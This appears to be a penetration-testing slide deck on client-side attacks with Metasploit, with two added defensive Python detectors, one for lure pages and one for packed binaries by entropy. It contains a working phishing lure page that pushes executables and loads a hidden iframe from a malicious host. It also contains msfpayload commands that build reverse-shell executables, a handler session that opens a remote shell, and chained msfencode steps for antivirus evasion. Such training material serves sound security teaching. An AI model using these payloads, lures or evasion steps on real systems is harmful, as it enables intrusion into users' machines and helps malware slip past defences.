Metasploit Framework Unleashed – Beyond Metasploit
Client Side Exploits
Introduction
Exploit Generation
AntiVirus Bypass
<< Contents <<
Introduction
<< Introduction <<
Client-side exploits == directed / targeted attacks
Target a specific organization / company / individuals
Target a specific piece of software or IT infrastructure
<< Introduction <<
Why client-side exploits?
Breaching the perimeter is much harder today than it used to be
More mature defence techniques and defence programmes:
- Security teams
- Separation of internal / external / DMZ networks
- Hardened, dedicated servers
- Firewalls
- IDS/IPS
- Security event monitoring and alerting
- Improved patch management
- Improved software security
- Increased security awareness
So what is the "low hanging fruit" today?
<< Introduction <<
Why client-side exploits?
Who always has access to the internal network? The USER
Who has access to the Internet at the same time? The USER
Who may be a local admin or even a domain admin? The USER
Who has legitimate access to sensitive company data? The USER
Also: users' workstations are (normally) less protected and less patched than servers, which means more attack vectors
Major danger: a growing number of 0-day exploits
<< Introduction <<
Why targeted attacks:
Detection:
- Individually crafted emails are less likely to trigger network spam and AV filters
Social engineering:
- Targeted attacks can be tailored to the individual victim
- They are therefore more likely to be read / opened / clicked by the victim
<< Introduction <<
Phases of the attack:
Information gathering
- Personal data: names, email addresses, etc. (Google, Maltego, ...)
- Company data: departments, partners, etc.
<< Introduction <<
Phases of the attack:
Generating the client-side exploit:
- metasploit / msfpayload
- SET (Social Engineering Toolkit):
-> construction kit for social-engineering attacks
-> uses parts of Metasploit
- etc.
<< Introduction <<
Phases of the attack:
Distributing the exploit and getting it executed via social engineering
(email, USB stick, fake websites, ...)
<< Introduction <<
Social engineering - email:
<< Introduction <<
Social engineering – prepared web page:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Free I Love You Ecards, I Love You Greeting Cards, I Love You Greetings, Cards, ecards, egreetings</title>
<meta name=description content="Send free cyber electronic greeting card and postcards with quotes and colors. eCards for holidays,birthdays,graduation,romantic,weddings,thank you,say hello to your friends. All occasion greeting cards,postcards,free eCards.">
</head>
<body background="bg.gif">
<center>
<a href="winner.exe"><img border="0" src="winner.gif"></a><br><br>
<font size="+1" face="Arial">Who is loving you? Do you want to know? <br>Just <a href="mylove.exe">click here</a> and choose either "Open" or "Run".</font><br><br><br>
<img border="0" src="123g.gif">
</center>
<iframe src="http://www.fakesite.tv/malicious.html" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>
</body>
</html>
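As an added example (not part of the original slides), here is a small defender-side check for the two tell-tale features of a lure page like the one above: links that point straight at executables and hidden 1x1 iframes. The sample page and the domain lure.example are constructed for the demonstration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# File extensions a greeting-card page has no business linking to.
EXECUTABLE_EXTS = (".exe", ".scr", ".com", ".pif", ".bat", ".vbs", ".hta", ".jar")

def _is_tiny(value) -> bool:
    """True for a width/height attribute of 0 or 1 pixel (units are ignored)."""
    if value is None:
        return False
    digits = "".join(ch for ch in value if ch.isdigit())
    return digits != "" and int(digits) <= 1

class LureScanner(HTMLParser):
    """Collects (kind, target) findings: executable download links and hidden iframes."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "a":
            # Only look at the URL path so "http://vendor.com/" is not mistaken for a .com file.
            path = urlparse(a.get("href", "").strip()).path.lower()
            if path.endswith(EXECUTABLE_EXTS):
                self.findings.append(("executable-link", a["href"]))
        elif tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            hidden = "visibility:hidden" in style or "display:none" in style
            tiny = _is_tiny(a.get("width")) and _is_tiny(a.get("height"))
            if hidden or tiny:
                self.findings.append(("hidden-iframe", a.get("src", "")))

def scan_html(document: str) -> list:
    scanner = LureScanner()
    scanner.feed(document)
    scanner.close()
    return scanner.findings

# Constructed sample modelled on the lure page above (not the original file).
SAMPLE_PAGE = """<html><head><title>Free Ecards</title></head>
<body background="bg.gif"><center>
<a href="winner.exe"><img border="0" src="winner.gif"></a>
<font face="Arial">Who is loving you? Just <a href="mylove.exe">click here</a>
and choose "Open" or "Run".</font>
<a href="about.html">About us</a>
</center>
<iframe src="http://lure.example/malicious.html" width="1" height="1"
 style="visibility:hidden;position:absolute"></iframe>
</body></html>"""

if __name__ == "__main__":
    for kind, target in scan_html(SAMPLE_PAGE):
        print(f"{kind:16} {target}")
```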
<< Introduction <<
Phases of the attack:
Installing the malicious software:
- Backdoor
- Bot
- meterpreter
- etc.
<< Introduction <<
Malware distribution: web browser vulnerabilities:
- Buffer overflows
- XSS
- Plugins
- Java / JavaScript / ActiveX
- Information disclosure: JavaScript (browser history, cached passwords, system information, etc.)
Binary payloads (email, web pages, USB sticks, etc.)
File format vulnerabilities:
- MS Office documents
- PDF (Adobe !!!)
- Image files (jpg: MS04-028, wmf: MS06-001)
- Media files (asf: CVE-2006-4702, asx: CVE-2006-6134)
<< Introduction <<
Exploit Generation
<< Exploit Generation <<
Binary payload with msfpayload
root@bt4:/pentest/exploits/framework3# ./msfpayload -h
Usage: ./msfpayload <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecutable|[D]ll|[V]BA|[W]ar>
Framework Payloads (225 total)
==============================

Name                          Description
----                          -----------
aix/ppc/shell_bind_tcp        Listen for a connection and spawn a command shell
aix/ppc/shell_find_port       Spawn a shell on an established connection
aix/ppc/shell_interact        Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp     Connect back to attacker and spawn a command shell
bsd/sparc/shell_bind_tcp      Listen for a connection and spawn a command shell
bsd/sparc/shell_reverse_tcp   Connect back to attacker and spawn a command shell
bsd/x86/exec                  Execute an arbitrary command
bsd/x86/metsvc_bind_tcp       Stub payload for interacting with a Meterpreter Service
...
<< Exploit Generation <<
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp O
Name: Windows Command Shell, Reverse TCP Inline
Version: 6479
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 287
Provided by:
vlad902 [email protected]
Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  seh              yes       Exit technique: seh, thread, process
LHOST                      yes       The local address
LPORT     4444             yes       The local port
Description:
Connect back to attacker and spawn a command shell
<< Exploit Generation <<
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp
LHOST=10.10.10.10 LPORT=31337 O
Name: Windows Command Shell, Reverse TCP Inline
Version: 6479
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 287
Provided by:
vlad902 [email protected]
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC seh yes Exit technique: seh, thread, process
LHOST 10.10.10.10 yes The local address
LPORT 31337 yes The local port
Description: Connect back to attacker and spawn a command shell
<< Exploit Generation <<
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp
LHOST=10.10.10.10 LPORT=31337 X > /tmp/1.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
Length: 287
Options: LHOST=10.10.10.10,LPORT=31337
<< Exploit Generation <<
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > set LHOST 10.10.10.10
LHOST => 10.10.10.10
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (10.10.10.10:31337 -> 10.10.10.20:1150)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Jim\My Documents>
<< Exploit Generation <<
Further Metasploit payloads:
Linux payloads
Java applet infection
VBScript infection
File format exploits (pdf, MS Office, etc.)
<< Exploit Generation <<
AV Bypass
<< AV Bypass <<
Tools:
Packers (UPX, ASPack, NsPack, PE_Compact, ...)
Crypters (EXECryptor, Fearz Crypter, ...)
Msfencode
Techniques:
Altering signatures (hex editor, debugging and modifying code, XOR stub, ...)
"Doing nothing": the malware behaves and looks like a legitimate application (Stuxnet)
Writing your own malware
<< AV Bypass <<
http://blogs.paretologic.com/malwarediaries/index.php/2010/02/22/virustotal/
http://www.offensivecomputing.net/?q=node/939
<< AV Bypass <<
Tools:
Packers, crypters:
<< AV Bypass <<
Tool: msfencode
root@bt4:/pentest/exploits/framework3# ./msfencode -h
Usage: ./msfencode
OPTIONS:
-a        The architecture to encode as
-b        The list of characters to avoid: '\x00\xff'
-c        The number of times to encode the data
-e        The encoder to use
-h        Help banner
-i        Encode the contents of the supplied file path
-k        Keep template working; run payload in new thread (use with -x)
-l        List available encoders
-m        Specifies an additional module search path
-n        Dump encoder information
-o        The output file
-s        The maximum size of the encoded data
-t        The format to display the encoded buffer with (raw, ruby, perl, c, exe, vba)
-x <opt>  Specify an alternate executable template
<< AV Bypass <<
root@bt4:/pentest/exploits/framework3# ./msfencode -l
Framework Encoders
==================

Name                       Rank       Description
----                       ----       -----------
cmd/generic_sh             normal     Generic Shell Variable Substitution Command Encoder
generic/none               normal     The "none" Encoder
mipsbe/longxor             normal     XOR Encoder
mipsle/longxor             normal     XOR Encoder
php/base64                 normal     PHP Base64 encoder
ppc/longxor                normal     PPC LongXOR Encoder
ppc/longxor_tag            normal     PPC LongXOR Encoder
sparc/longxor_tag          normal     SPARC DWORD XOR Encoder
x86/alpha_mixed            low        Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper            low        Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower     manual     Avoid UTF8/tolower
x86/call4_dword_xor        normal     Call+4 Dword XOR Encoder
x86/countdown              normal     Single-byte XOR Countdown Encoder
x86/fnstenv_mov            normal     Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive      great      Polymorphic Jump/Call XOR Additive Feedback Encoder
x86/nonalpha               low        Non-Alpha Encoder
x86/nonupper               low        Non-Upper Encoder
x86/shikata_ga_nai         excellent  Polymorphic XOR Additive Feedback Encoder
x86/unicode_mixed          manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper          manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
<< AV Bypass <<
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp
LHOST=10.10.10.10 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t exe >
/tmp/2.exe
[*] x86/shikata_ga_nai succeeded with size 315 (iteration=1)
<< AV Bypass <<
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp
LHOST=10.10.10.10 LPORT=31337 R |
./msfencode -e x86/shikata_ga_nai -t raw -c 10 |
./msfencode -e x86/call4_dword_xor -t raw -c 10 |
./msfencode -e x86/countdown -t exe > /tmp/3.exe
[*] x86/shikata_ga_nai succeeded with size 315 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 342 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 369 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 396 (iteration=4)
...
<< AV Bypass <<
From msfpayload -h:
windows/shell_reverse_tcp: Connect back to attacker and spawn a command shell
windows/shell/reverse_tcp: Connect back to attacker and spawn a command shell (staged)
<< AV Bypass <<
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell/reverse_tcp
LHOST=10.10.10.10 LPORT=31337 X > /tmp/4.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
Length: 278
Options: LHOST=10.10.10.10,LPORT=31337
<< AV Bypass <<
Technique: modifying the binary with Resource Hacker
<< AV Bypass <<
Before:
After:
Technique: XOR stub
<< AV Bypass <<
Unmodified binary – on disk:
Entry Point
Technique: XOR stub
<< AV Bypass <<
Modified binary – on disk:
Entry Point - Hijacked
Technique: XOR stub
<< AV Bypass <<
Modified binary – in memory:
Entry Point - Hijacked
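The packer/crypter tools and the XOR-stub slides share one defender-relevant property: the body that is only decoded in memory sits on disk as compressed or encrypted data, which a per-section entropy check can flag. This is an added example, not part of the original slides; the section names and sample bytes are constructed (a seeded PRNG stands in for an encrypted body), and it also shows a limit of the heuristic.

```python
import math
import random
from collections import Counter

# Entropy (bits per byte) above which a region looks compressed or encrypted.
PACKED_THRESHOLD = 7.0

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string: 0.0 for constant data, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())

def scan_sections(sections: dict, threshold: float = PACKED_THRESHOLD) -> dict:
    """Map each section name to (entropy, flagged); flagged sections deserve a closer
    look (packer/crypter body, or an XOR stub's encrypted payload stored on disk)."""
    result = {}
    for name, body in sections.items():
        e = shannon_entropy(body)
        result[name] = (round(e, 3), e >= threshold)
    return result

def build_sample_sections() -> dict:
    """Constructed sample input, not a real PE file: a plain code-like section and a
    stand-in for an encrypted body generated by a seeded PRNG (reproducible)."""
    plain = (b"push ebp; mov ebp, esp; call handler; leave; ret\n" * 100)[:4096]
    rng = random.Random(1234)
    crypted = bytes(rng.getrandbits(8) for _ in range(4096))
    return {".text": plain, ".rsrc": crypted}

def single_byte_xor(data: bytes, key: int) -> bytes:
    """Toy single-byte XOR, used only to demonstrate a blind spot of the heuristic."""
    return bytes(b ^ key for b in data)

if __name__ == "__main__":
    for name, (entropy, flagged) in scan_sections(build_sample_sections()).items():
        print(f"{name:8} entropy={entropy:.3f} {'PACKED?' if flagged else 'ok'}")
    # Caveat: XOR with a single byte only permutes byte values, so the entropy
    # is unchanged and this check cannot see such a stub's payload.
    plain = build_sample_sections()[".text"]
    print(shannon_entropy(plain), shannon_entropy(single_byte_xor(plain, 0x5A)))
```

Entropy is a triage signal, not a verdict: legitimately compressed resources also score high, and a short or single-byte XOR key leaves the score untouched.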
<< thx <<
Contact: [email protected] [email protected] http://www.corelan.be:8800